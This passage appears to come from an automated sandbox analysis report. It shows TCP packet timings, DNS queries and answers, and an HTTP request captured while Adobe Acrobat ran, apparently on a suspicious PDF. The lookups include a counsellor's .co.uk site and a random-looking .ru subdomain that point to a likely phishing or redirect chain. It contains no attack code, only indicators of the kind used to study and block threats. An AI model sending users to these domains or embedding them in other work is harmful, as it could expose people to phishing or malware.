                                                      Mar 25, 2025 11:54:20.007312059 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.007322073 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048048973 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048077106 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048115015 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.048121929 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048131943 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048161983 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048171043 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048181057 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.048185110 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048193932 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.048197985 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048237085 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.048247099 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048270941 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048300982 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.048306942 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048315048 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048326969 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.048332930 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048362017 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.048366070 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.048389912 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.067656040 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067676067 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067708015 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067763090 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.067774057 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067819118 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067832947 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067840099 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.067856073 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067867041 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.067883968 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067899942 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.067900896 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067910910 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067953110 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.067960024 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067982912 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.067996979 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068023920 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068032980 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068048954 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068064928 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068135977 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068152905 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068159103 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068164110 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068171978 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068187952 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068207979 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068211079 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068216085 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068233013 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068270922 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068274975 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068315029 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068329096 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068358898 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068381071 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068383932 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068391085 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068440914 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068461895 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068465948 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068480968 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068495035 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068536043 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068541050 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068557978 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068567038 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068608999 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068613052 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068650007 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068670034 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068691969 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068697929 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068710089 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068727970 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068823099 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.068840027 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.068914890 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.069355011 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.069483042 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.078552961 CET49712443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.078577042 CET44349712104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.203711033 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.203814983 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.203900099 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.204068899 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.204104900 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.396200895 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.396480083 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.573735952 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.573822021 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.574166059 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.617379904 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.660283089 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.708833933 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.721103907 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.721112967 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.721124887 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.721205950 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.721271992 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.721339941 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.744652987 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.744683027 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.744748116 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.744821072 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.744863033 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.788197041 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.812129021 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.812139988 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.812169075 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.812321901 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.812321901 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.812393904 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.812460899 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.825706005 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.825728893 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.825938940 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.825938940 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.826003075 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.826076984 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.837714911 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.837734938 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.837795019 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.837804079 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.837956905 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.845844984 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.845916033 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.845921993 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.845968008 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.846328974 CET49714443192.168.2.6151.101.194.137
                                                      Mar 25, 2025 11:54:20.846360922 CET44349714151.101.194.137192.168.2.6
                                                      Mar 25, 2025 11:54:20.944278955 CET49716443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.944324017 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.945241928 CET49716443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.946868896 CET49716443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:20.946885109 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.152559996 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.152806044 CET49716443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:21.152818918 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.152995110 CET49716443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:21.153001070 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.661717892 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.661899090 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.661971092 CET49716443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:21.664860964 CET49716443192.168.2.6104.21.48.1
                                                      Mar 25, 2025 11:54:21.664886951 CET44349716104.21.48.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.766366005 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:21.766406059 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.766455889 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:21.766633034 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:21.766637087 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.959345102 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.960712910 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:21.960712910 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:21.960726023 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.961007118 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.961302042 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.004312038 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.166835070 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.166915894 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.167052031 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.167345047 CET49718443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.167366028 CET4434971835.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.167758942 CET49719443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.167855978 CET4434971935.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.167989969 CET49719443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.168107986 CET49719443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.168128014 CET4434971935.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.357042074 CET4434971935.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.357419968 CET49719443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.357420921 CET49719443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.357485056 CET4434971935.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.357536077 CET4434971935.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.577656984 CET4434971935.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.577980995 CET49719443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:22.578171968 CET4434971935.190.80.1192.168.2.6
                                                      Mar 25, 2025 11:54:22.578310966 CET49719443192.168.2.635.190.80.1
                                                      Mar 25, 2025 11:54:29.986366034 CET44349710185.199.220.71192.168.2.6
                                                      Mar 25, 2025 11:54:29.986440897 CET44349710185.199.220.71192.168.2.6
                                                      Mar 25, 2025 11:54:29.986486912 CET49710443192.168.2.6185.199.220.71
                                                      Mar 25, 2025 11:54:30.988240004 CET49710443192.168.2.6185.199.220.71
                                                      Mar 25, 2025 11:54:30.988266945 CET44349710185.199.220.71192.168.2.6
                                                      Mar 25, 2025 11:55:01.740432024 CET4969880192.168.2.6142.251.40.131
                                                      Mar 25, 2025 11:55:01.830017090 CET8049698142.251.40.131192.168.2.6
                                                      Mar 25, 2025 11:55:01.830095053 CET4969880192.168.2.6142.251.40.131
                                                      Mar 25, 2025 11:55:02.793268919 CET443496812.23.227.215192.168.2.6
                                                      Mar 25, 2025 11:55:02.793303967 CET443496812.23.227.215192.168.2.6
                                                      Mar 25, 2025 11:55:02.793502092 CET49681443192.168.2.62.23.227.215
                                                      Mar 25, 2025 11:55:16.226552010 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:16.226651907 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:55:16.226847887 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:16.226921082 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:16.226939917 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:55:16.421037912 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:55:16.421298027 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:16.421557903 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:16.421588898 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:55:16.422169924 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:55:16.472995996 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:26.439542055 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:55:26.439594030 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:55:26.439771891 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:27.899338007 CET49724443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:55:27.899365902 CET44349724142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:56:16.288742065 CET49732443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:56:16.288789034 CET44349732142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:56:16.288968086 CET49732443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:56:16.292296886 CET49732443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:56:16.292309046 CET44349732142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:56:17.511487007 CET44349732142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:56:17.511786938 CET49732443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:56:17.511822939 CET44349732142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:56:27.511331081 CET44349732142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:56:27.511404037 CET44349732142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:56:27.511454105 CET49732443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:56:27.898145914 CET49732443192.168.2.6142.250.80.100
                                                      Mar 25, 2025 11:56:27.898165941 CET44349732142.250.80.100192.168.2.6
                                                      Mar 25, 2025 11:57:06.768214941 CET49679443192.168.2.620.191.45.158
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 25, 2025 11:53:58.489624023 CET5035753192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:53:58.588011026 CET53503571.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:11.813998938 CET53639071.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:11.828602076 CET53591161.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:12.565188885 CET53529171.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:16.163136005 CET5963553192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:16.163254023 CET6476053192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:16.261776924 CET53596351.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:16.262456894 CET53647601.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:17.302557945 CET6403753192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:17.302637100 CET6234253192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:17.703737020 CET53640371.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:17.704965115 CET53623421.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:18.443054914 CET6403353192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:18.443212986 CET5722153192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:18.775466919 CET53572211.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:18.789818048 CET53640331.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.104160070 CET6346153192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:20.104160070 CET5616453192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:20.202542067 CET53634611.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:20.203087091 CET53561641.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.025362015 CET53548611.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.663727999 CET6206353192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:21.663917065 CET5046853192.168.2.61.1.1.1
                                                      Mar 25, 2025 11:54:21.762979984 CET53620631.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:21.765842915 CET53504681.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:29.605348110 CET53611131.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:48.528136015 CET53551271.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:54:50.013595104 CET138138192.168.2.6192.168.2.255
                                                      Mar 25, 2025 11:55:11.453877926 CET53579711.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:55:11.625719070 CET53602231.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:55:14.598577976 CET53572801.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:55:42.055658102 CET53640901.1.1.1192.168.2.6
                                                      Mar 25, 2025 11:56:27.215372086 CET53627001.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Mar 25, 2025 11:53:58.489624023 CET192.168.2.61.1.1.10x729fStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:16.163136005 CET192.168.2.61.1.1.10x61cdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:16.163254023 CET192.168.2.61.1.1.10xa781Standard query (0)www.google.com65IN (0x0001)false
                                                      Mar 25, 2025 11:54:17.302557945 CET192.168.2.61.1.1.10x6720Standard query (0)sallybarmescounsellor.co.ukA (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:17.302637100 CET192.168.2.61.1.1.10x4f3eStandard query (0)sallybarmescounsellor.co.uk65IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.443054914 CET192.168.2.61.1.1.10x5fa6Standard query (0)uz5k.vsmaemhjvk.ruA (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.443212986 CET192.168.2.61.1.1.10xcfd0Standard query (0)uz5k.vsmaemhjvk.ru65IN (0x0001)false
                                                      Mar 25, 2025 11:54:20.104160070 CET192.168.2.61.1.1.10x73ebStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:20.104160070 CET192.168.2.61.1.1.10x7623Standard query (0)code.jquery.com65IN (0x0001)false
                                                      Mar 25, 2025 11:54:21.663727999 CET192.168.2.61.1.1.10x8376Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:21.663917065 CET192.168.2.61.1.1.10xe743Standard query (0)a.nel.cloudflare.com65IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Mar 25, 2025 11:53:58.588011026 CET1.1.1.1192.168.2.60x729fNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 25, 2025 11:53:58.588011026 CET1.1.1.1192.168.2.60x729fNo error (0)crl.root-x1.letsencrypt.org.edgekey.nete8652.dscx.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 25, 2025 11:53:58.588011026 CET1.1.1.1192.168.2.60x729fNo error (0)e8652.dscx.akamaiedge.net23.216.136.238A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:53:58.904853106 CET1.1.1.1192.168.2.60x3d4fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:53:58.904853106 CET1.1.1.1192.168.2.60x3d4fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:16.261776924 CET1.1.1.1192.168.2.60x61cdNo error (0)www.google.com142.250.80.100A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:16.262456894 CET1.1.1.1192.168.2.60xa781No error (0)www.google.com65IN (0x0001)false
                                                      Mar 25, 2025 11:54:17.703737020 CET1.1.1.1192.168.2.60x6720No error (0)sallybarmescounsellor.co.uk185.199.220.71A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.775466919 CET1.1.1.1192.168.2.60xcfd0No error (0)uz5k.vsmaemhjvk.ru65IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.789818048 CET1.1.1.1192.168.2.60x5fa6No error (0)uz5k.vsmaemhjvk.ru104.21.48.1A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.789818048 CET1.1.1.1192.168.2.60x5fa6No error (0)uz5k.vsmaemhjvk.ru104.21.32.1A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.789818048 CET1.1.1.1192.168.2.60x5fa6No error (0)uz5k.vsmaemhjvk.ru104.21.80.1A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.789818048 CET1.1.1.1192.168.2.60x5fa6No error (0)uz5k.vsmaemhjvk.ru104.21.96.1A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.789818048 CET1.1.1.1192.168.2.60x5fa6No error (0)uz5k.vsmaemhjvk.ru104.21.16.1A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.789818048 CET1.1.1.1192.168.2.60x5fa6No error (0)uz5k.vsmaemhjvk.ru104.21.64.1A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:18.789818048 CET1.1.1.1192.168.2.60x5fa6No error (0)uz5k.vsmaemhjvk.ru104.21.112.1A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:20.202542067 CET1.1.1.1192.168.2.60x73ebNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:20.202542067 CET1.1.1.1192.168.2.60x73ebNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:20.202542067 CET1.1.1.1192.168.2.60x73ebNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:20.202542067 CET1.1.1.1192.168.2.60x73ebNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                      Mar 25, 2025 11:54:21.762979984 CET1.1.1.1192.168.2.60x8376No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • sallybarmescounsellor.co.uk
                                                      • uz5k.vsmaemhjvk.ru
                                                        • code.jquery.com
                                                      • www.google.com
                                                      • a.nel.cloudflare.com
                                                      • x1.i.lencr.org
                                                      • c.pki.goog

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.64969223.216.136.238803608C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Mar 25, 2025 11:53:58.681144953 CET115OUTGET / HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                      Host: x1.i.lencr.org
                                                      Mar 25, 2025 11:53:58.771665096 CET1254INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Content-Type: application/pkix-cert
                                                      Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT
                                                      ETag: "64cd6654-56f"
                                                      Content-Disposition: attachment; filename="ISRG Root X1.der"
                                                      Cache-Control: max-age=56565
                                                      Expires: Wed, 26 Mar 2025 02:36:43 GMT
                                                      Date: Tue, 25 Mar 2025 10:53:58 GMT
                                                      Content-Length: 1391
                                                      Connection: keep-alive
